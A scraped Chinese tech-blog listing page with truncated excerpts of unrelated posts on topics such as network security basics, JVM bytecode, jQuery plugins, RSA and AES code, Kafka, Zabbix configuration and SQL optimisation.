    网络安全技术深度解析与代码实践随着信息技术的飞速发展,计算机网络已经广泛应用于政治、军事、商业等各个领域,与人们的生活越来越紧密。然而,这也带来了日益严峻的网络安全问题。网络安全是指保护计算机网络免受未经授权的访问、破坏或数据泄露的措施,是信息技术领域的重要课题。本文将详细介绍网络安全技术,并通过代码示例展示其实际应用。一、网络安全的重要性网络安全对于个人隐私、企业机密和国家安全至关重要。未经授权
  • 使用 go zero 开发 FPS 游戏后端需求文档 阿贾克斯的黎明 游戏开发游戏
    目录使用gozero开发FPS游戏后端需求文档一、项目背景二、功能需求(一)用户管理(二)游戏匹配(三)游戏房间管理(四)游戏逻辑处理(五)数据存储与管理三、非功能需求(一)性能需求(二)安全需求(三)可扩展性需求一、项目背景随着游戏行业的快速发展,第一人称射击(FPS)游戏以其紧张刺激的游戏体验深受玩家喜爱。为了给玩家提供流畅、公平且具备丰富玩法的FPS游戏,本项目旨在使用gozero框架开发一
  • JVM StackMapTable 属性的作用及理解 lijingyao8206 jvm字节码Class文件StackMapTable
            在Java 6版本之后JVM引入了栈图(Stack Map Table)概念。为了提高验证过程的效率,在字节码规范中添加了Stack Map Table属性,以下简称栈图,其方法的code属性中存储了局部变量和操作数的类型验证以及字节码的偏移量。也就是一个method需要且仅对应一个Stack Map Table。在Java 7版
  • 回调函数调用方法 百合不是茶 java
    最近在看大神写的代码时,.发现其中使用了很多的回调 ,以前只是在学习的时候经常用到 ,现在写个笔记 记录一下   代码很简单:           MainDemo  :调用方法  得到方法的返回结果        
  • [时间机器]制造时间机器需要一些材料 comsci 制造
          根据我的计算和推测,要完全实现制造一台时间机器,需要某些我们这个世界不存在的物质     和材料...       甚至可以这样说,这种材料和物质,我们在反应堆中也无法获得......      
  • 开口埋怨不如闭口做事 邓集海 邓集海 做人 做事 工作
    “开口埋怨,不如闭口做事。”不是名人名言,而是一个普通父亲对儿子的训导。但是,因为这句训导,这位普通父亲却造就了一个名人儿子。这位普通父亲造就的名人儿子,叫张明正。      张明正出身贫寒,读书时成绩差,常挨老师批评。高中毕业,张明正连普通大学的分数线都没上。高考成绩出来后,平时开口怨这怨那的张明正,不从自身找原因,而是不停地埋怨自己家庭条件不好、埋怨父母没有给他创造良好的学习环境。      
  • jQuery插件开发全解析,类级别与对象级别开发 IT独行者 jquery开发插件 函数
    jQuery插件的开发包括两种: 一种是类级别的插件开发,即给 jQuery添加新的全局函数,相当于给 jQuery类本身添加方法。 jQuery的全局函数就是属于 jQuery命名空间的函数,另一种是对象级别的插件开发,即给 jQuery对象添加方法。下面就两种函数的开发做详细的说明。   1 、类级别的插件开发 类级别的插件开发最直接的理解就是给jQuer
  • Rome解析Rss 413277409 Rome解析Rss
    import java.net.URL;  import java.util.List;    import org.junit.Test;    import com.sun.syndication.feed.synd.SyndCategory;  import com.sun.syndication.feed.synd.S
  • RSA加密解密 无量 加密解密rsa
    RSA加密解密代码 代码有待整理 package com.tongbanjie.commons.util; import java.security.Key; import java.security.KeyFactory; import java.security.KeyPair; import java.security.KeyPairGenerat
  • linux 软件安装遇到的问题 aichenglong linux遇到的问题ftp
    1 ftp配置中遇到的问题    500 OOPS: cannot change directory   出现该问题的原因:是SELinux安装机制的问题.只要disable SELinux就可以了   修改方法:1 修改/etc/selinux/config 中SELINUX=disabled    2 source /etc
  • 面试心得 alafqq 面试
    最近面试了好几家公司。记录下; 支付宝,面试我的人胖胖的,看着人挺好的;博彦外包的职位,面试失败; 阿里金融,面试官人也挺和善,只不过我让他吐血了。。。 由于印象比较深,记录下; 1,自我介绍 2,说下八种基本类型;(算上string。楼主才答了3种,哈哈,string其实不是基本类型,是引用类型) 3,什么是包装类,包装类的优点; 4,平时看过什么书?NND,什么书都没看过。。照样
  • java的多态性探讨 百合不是茶 java
    java的多态性是指main方法在调用属性的时候类可以对这一属性做出反应的情况 //package 1; class A{ public void test(){ System.out.println("A"); } } class D extends A{ public void test(){ S
  • 网络编程基础篇之JavaScript-学习笔记 bijian1013 JavaScript
    1.documentWrite <html> <head> <script language="JavaScript"> document.write("这是电脑网络学校"); document.close(); </script> </h
  • 探索JUnit4扩展:深入Rule bijian1013 JUnitRule单元测试
            本文将进一步探究Rule的应用,展示如何使用Rule来替代@BeforeClass,@AfterClass,@Before和@After的功能。         在上一篇中提到,可以使用Rule替代现有的大部分Runner扩展,而且也不提倡对Runner中的withBefores(),withAfte
  • [CSS]CSS浮动十五条规则 bit1129 css
    这些浮动规则,主要是参考CSS权威指南关于浮动规则的总结,然后添加一些简单的例子以验证和理解这些规则。   1. 所有的页面元素都可以浮动 2. 一个元素浮动后,会成为块级元素,比如<span>,a, strong等都会变成块级元素 3.一个元素左浮动,会向最近的块级父元素的左上角移动,直到浮动元素的左外边界碰到块级父元素的左内边界;如果这个块级父元素已经有浮动元素停靠了
  • 【Kafka六】Kafka Producer和Consumer多Broker、多Partition场景 bit1129 partition
    0.Kafka服务器配置 3个broker 1个topic,6个partition,副本因子是2 2个consumer,每个consumer三个线程并发读取   1. Producer package kafka.examples.multibrokers.producers; import java.util.Properties; import java.util.
  • zabbix_agentd.conf配置文件详解 ronin47 zabbix 配置文件
    Aliaskey的别名,例如 Alias=ttlsa.userid:vfs.file.regexp[/etc/passwd,^ttlsa:.:([0-9]+),,,,\1], 或者ttlsa的用户ID。你可以使用key:vfs.file.regexp[/etc/passwd,^ttlsa:.: ([0-9]+),,,,\1],也可以使用ttlsa.userid。备注: 别名不能重复,但是可以有多个
  • java--19.用矩阵求Fibonacci数列的第N项 bylijinnan fibonacci
    参考了网上的思路,写了个Java版的: public class Fibonacci { final static int[] A={1,1,1,0}; public static void main(String[] args) { int n=7; for(int i=0;i<=n;i++){ int f=fibonac
  • Netty源码学习-LengthFieldBasedFrameDecoder bylijinnan javanetty
    先看看LengthFieldBasedFrameDecoder的官方API http://docs.jboss.org/netty/3.1/api/org/jboss/netty/handler/codec/frame/LengthFieldBasedFrameDecoder.html API举例说明了LengthFieldBasedFrameDecoder的解析机制,如下: 实
  • AES加密解密 chicony 加密解密
    AES加解密算法,使用Base64做转码以及辅助加密: package com.wintv.common; import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import sun.misc.BASE64Decod
  • 文件编码格式转换 ctrain 编码格式
    package com.test; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream;
  • mysql 在linux客户端插入数据中文乱码 daizj mysql中文乱码
    1、查看系统客户端,数据库,连接层的编码  查看方法: http://daizj.iteye.com/blog/2174993 进入mysql,通过如下命令查看数据库编码方式: mysql>  show variables like 'character_set_%'; +--------------------------+------
  • 好代码是廉价的代码 dcj3sjt126com 程序员读书
      长久以来我一直主张:好代码是廉价的代码。 当我跟做开发的同事说出这话时,他们的第一反应是一种惊愕,然后是将近一个星期的嘲笑,把它当作一个笑话来讲。 当他们走近看我的表情、知道我是认真的时,才收敛一点。 当最初的惊愕消退后,他们会用一些这样的话来反驳: “好代码不廉价,好代码是采用经过数十年计算机科学研究和积累得出的最佳实践设计模式和方法论建立起来的精心制作的程序代码。” 我只
  • Android网络请求库——android-async-http dcj3sjt126com android
    在iOS开发中有大名鼎鼎的ASIHttpRequest库,用来处理网络请求操作,今天要介绍的是一个在Android上同样强大的网络请求库android-async-http,目前非常火的应用Instagram和Pinterest的Android版就是用的这个网络请求库。这个网络请求库是基于Apache HttpClient库之上的一个异步网络请求处理库,网络处理均基于Android的非UI线程,通
  • ORACLE 复习笔记之SQL语句的优化 eksliang SQL优化Oracle sql语句优化SQL语句的优化
    转载请出自出处:http://eksliang.iteye.com/blog/2097999   SQL语句的优化总结如下   sql语句的优化可以按照如下六个步骤进行: 合理使用索引 避免或者简化排序 消除对大表的扫描 避免复杂的通配符匹配 调整子查询的性能 EXISTS和IN运算符 下面我就按照上面这六个步骤分别进行总结:
  • 浅析:Android 嵌套滑动机制(NestedScrolling) gg163 android移动开发滑动机制嵌套
    谷歌在发布安卓 Lollipop版本之后,为了更好的用户体验,Google为Android的滑动机制提供了NestedScrolling特性 NestedScrolling的特性可以体现在哪里呢?<!--[if !supportLineBreakNewLine]--><!--[endif]--> 比如你使用了Toolbar,下面一个ScrollView,向上滚
  • 使用hovertree菜单作为后台导航 hvt JavaScriptjquery.nethovertreeasp.net
      hovertree是一个jquery菜单插件,官方网址:http://keleyi.com/jq/hovertree/ ,可以登录该网址体验效果。 0.1.3版本:http://keleyi.com/jq/hovertree/demo/demo.0.1.3.htm hovertree插件包含文件: http://keleyi.com/jq/hovertree/css
  • SVG 教程 (二)矩形 天梯梦 svg
    SVG <rect> SVG Shapes SVG有一些预定义的形状元素,可被开发者使用和操作: 矩形 <rect> 圆形 <circle> 椭圆 <ellipse> 线 <line> 折线 <polyline> 多边形 <polygon> 路径 <path>
  • 一个简单的队列 luyulong java数据结构队列
    public class MyQueue { private long[] arr; private int front; private int end; // 有效数据的大小 private int elements; public MyQueue() { arr = new long[10]; elements = 0; front
  • 基础数据结构和算法九:Binary Search Tree sunwinner Algorithm
      A binary search tree (BST) is a binary tree where each node has a Comparable key (and an associated value) and satisfies the restriction that the key in any node is larger than the keys in all
  • 项目出现的一些问题和体会 Steven-Walker DAOWebservlet
         第一篇博客不知道要写点什么,就先来点近阶段的感悟吧。     这几天学了servlet和数据库等知识,就参照老方的视频写了一个简单的增删改查的,完成了最简单的一些功能,使用了三层架构。 dao层完成的是对数据库具体的功能实现,service层调用了dao层的实现方法,具体对servlet提供支持。  &
  • 高手问答:Java老A带你全面提升Java单兵作战能力! ITeye管理员 java
    本期特邀《Java特种兵》作者:谢宇,CSDN论坛ID: xieyuooo 针对JAVA问题给予大家解答,欢迎网友积极提问,与专家一起讨论! 作者简介: 淘宝网资深Java工程师,CSDN超人气博主,人称“胖哥”。 CSDN博客地址: http://blog.csdn.net/xieyuooo 作者在进入大学前是一个不折不扣的计算机白痴,曾经被人笑话过不懂鼠标是什么,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他